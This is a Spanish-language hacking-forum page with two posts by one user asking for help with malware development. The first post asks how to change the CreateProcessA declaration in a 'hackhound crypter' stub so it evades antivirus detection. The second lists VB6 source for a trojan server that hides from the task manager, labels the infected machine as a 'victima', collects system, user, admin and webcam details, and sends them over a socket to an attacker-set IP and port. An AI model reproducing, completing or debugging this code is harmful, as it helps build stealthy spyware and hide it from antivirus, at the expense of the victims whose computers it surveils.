elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Temas
Páginas: [1]
1  Programación / Programación Visual Basic / Ayuda con funciones en VB6 en: 8 Febrero 2009, 03:33 am
Muy buenas foro, tengo una dudilla aver si me podeis ayudar...

pues bueno resulta que descarger un source de un crypter, llamado hackhound crypter y bueno, estoy modificando el stub para hacerlo fud para uso propio...
el stub tiene 4 modulos .bas y un modulos de clase y uno de ellos es detectado por 6 avs la mas gracia es que yo modifico esta linea del codigo:

Código:
Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long

pero solamente le cambio esta palabra
Código:
CreateProcessA
le pongo x ejemplo hola y al escanear el stub le quita 3 avs pero... se rompe el stub e probado varias maneras proniendo un alias y eso pero nada se me sigue rompiendo alguien sabe como modificar esta funcion para que funcione y no se rompa el stub y encripte bien, es que me esta volviendo loco y no doy con la manera   :rolleyes:

muchas gracias y saludo de antemano ;D
2  Programación / Programación Visual Basic / Ayuda Con Cliente y Servidor en visual basic en: 20 Diciembre 2008, 08:22 am
Muy buenas a todo, resulta que estoy creando un cliente y un servidor en visual basic resulta que el cliente esta bien pero el code del servidor me tira este error y no se xk causa o pongo aqui abajo el code del servidor aver si me podeis ayudar....

Código:
Dim victima As String, name1 As String, so As String, ip As String, port As String
Dim webcam As String, pais As String, tor As String, nombrepc As String, procesador As String
Dim admin As Boolean
Private Sub form_load()
On Error Resume Next
Open Environ("windir") & "\KB007.txt" For Input As #1 'abrimos un archivo de texto en el directorio de windows
Input #1, victima 'leemos el contenido de este
If victima = "" Then 'si esta vacio
victima = "Default" 'le ponemos default a la victima
End If 'sino victima contendrá lo que contenga ese archivo, eso es para cuando cambiemos el nombre a la victima.
Close #1
Dim yo As Object
Set yo = CreateObject("wscript.shell")
pais = ObtenerIdioma(LOCALE_SNATIVECTRYNAME)
nombrepc = Environ("ComputerName") 'esta variable contendrá el nombre del pc
name1 = Environ("UserName") 'el nombre de usuario
so = yo.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Productname") 'el sistema operativo
ip = "127.0.0.1" 'la ip, pueden hacer un edit server
port = 2300 'lo mismo, con el edit server lo editan….
procesador = yo.regread("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString") 'júntenlo, es k no cabía, es para el procesador....
App.TaskVisible = False 'para que no se vea en el admin de tareas en aplicaciones
If App.PrevInstance = True Then: End 'si ya esta en ejecución salimos, para no tener 2 corriendo a la vez
Me.Visible = False 'para que no se vea el form….
'Esto es para la webcam
Dim temp As Long
hwdc = capCreateCaptureWindow("CapWindow", ws_child Or ws_visible,
_0, 0, 320, 240, Picture1.hWnd, 0)
If (hwdc <> 0) Then
webcam = "Si" 'entonces si tenemos webcam
temp = DestroyWindow(hwdc)
temp = SendMessage(hwdc, WM_CAP_DRIVER_DISCONNECT, 0&, 0&)
DoEvents
Else
webcam = "No" 'pues no
End If
pais = ObtenerIdioma(LOCALE_SNATIVECTRYNAME) 'para obtener el país
admin = CBool(IsNTAdmin(ByVal 0&, ByVal 0&)) 'para saber si somos admins o no
If admin = True Then
tor = "Si"
Else
tor = "No"
End If
End Sub
'la función para obtener el idioma y pais
Public Function ObtenerIdioma(ByVal lInfo As Long) As String
Dim buffer As String, ret As String
buffer = String$(256, 0)
ret = GetLocaleInfo(LOCALE_USER_DEFAULT, lInfo, buffer, Len(buffer))
'Si Ret devuelve 0 es porque falló la llamada al Api
If ret > 0 Then
ObtenerIdioma = Left$(buffer, ret - 1)
Else
ObtenerIdioma = ""
End If
End Function
'función para obtener la memoria ram
Public Function GetRamSize() As String
Dim RamStats As MEMORYSTATUS
GlobalMemoryStatus RamStats
GetRamSize = Round((RamStats.dwTotalPhys / 1024) / 1024) + 1
End Function
Private Sub Timer1_Timer()
If WS.State <> 7 Then 'si no estamos conectados
WS.Close 'cerramos
End If
End Sub
Private Sub WS_Connect() 'al haber conexión,enviamos todos los datos
WS.SendData "Conexion|" & victima & "|" & nombrepc & "|" & name1 & "|" & so & "|" & GetRamSize & "|" & pais & "|" & procesador & "|" & tor & "|" & webcam
End Sub
Private Sub WS_DataArrival(ByVal bytesTotal As Long) 'al recibir los datos
On Error Resume Next
Dim datos As String
Dim data() As String
WS.GetData datos 'los recibimos
data = Split(datos, "|")
Select Case data(0)
Case "nombrecan" 'recuerden que fue lo que enviamos como marca al cambiar el nombre
Open Environ("windir") & "\KB007.txt" For Output As #1
Print #1, , data(1) 'ponemos en el texto el nombre que se cambió
Close #1
End Select
End Sub


el error me lo tira aqui....

Código:
hwdc = capCreateCaptureWindow("CapWindow", ws_child Or ws_visible,
_0, 0, 320, 240, Picture1.hWnd, 0)

llevo pokisimo en vb y no consigo sacar este error, tb me estoy leyendo un libro de 140 pags para ponerme al dia xDD aver si me pueden ayudar gracias de antemano

Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines